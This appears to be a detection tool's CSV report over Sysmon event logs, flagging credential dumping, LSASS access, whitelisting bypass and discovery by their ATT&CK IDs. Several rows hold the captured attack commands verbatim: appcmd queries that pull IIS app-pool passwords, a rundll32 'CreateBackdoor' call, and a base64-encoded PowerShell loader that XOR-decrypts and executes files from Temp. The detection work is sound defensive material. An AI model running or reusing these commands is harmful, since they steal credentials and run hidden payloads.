1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-02 16:24:26.803 + 747F3D96-E8BA-5F26-0000-001035BE1A00 + 8104 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "c:\windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E308-5F26-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E309-5F26-0000-0010137B0000 + 820 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch -p + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 29 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:35.680 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606895.720774,2019-04-18T21:01:35.720774+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 29 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:35.680 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\vaultcli.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Credential Vault Client Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.731362,2019-05-27T05:29:17.731362+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5898 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.691 + 365ABB72-3D6D-5CEB-0000-00104474FF00 + 2448 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003.001] Credential dump Thread Open to Lsass,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,Process ( \\VBOXSVR\HTools\voice_mail.msg.exe) attempted to access lsass process ( C:\Windows\System32\lsass.exe),8," + + + + + 8 + 2 + 4 + 8 + 0 + 0x8000000000000000 + + + 9066 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 12:43:43.784 + 365ABB72-4055-5CC8-0000-0010769D0B00 + 1532 + \\VBOXSVR\HTools\voice_mail.msg.exe + 365ABB72-3FE0-5CC8-0000-00107E590000 + 492 + C:\Windows\System32\lsass.exe + 3656 + 0x001A0000 + + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.661261,2019-05-27T05:29:17.661261+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5895 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.621 + 365ABB72-3D6D-5CEB-0000-00108270FF00 + 1340 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "Filename: redirection.config" /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.425419,2020-03-21T09:00:25.425419+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243552 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.397 + 747F3D96-9F69-5E75-0000-001033922000 + 6572 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 27 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.629 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.689291,2019-04-18T21:01:34.689291+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 27 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.629 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\hid.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Hid User Library + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.581146,2019-05-27T05:29:17.581146+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5892 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.420 + 365ABB72-3D6D-5CEB-0000-0010576BFF00 + 2928 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1584794166.990686,2020-03-21T16:36:06.990686+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244341 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 12:36:03.899 + 747F3D96-0A33-5E76-0000-0010B8813D00 + 3696 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-069C-5E76-0000-0020E7030000 + 0x3e7 + 0 + System + 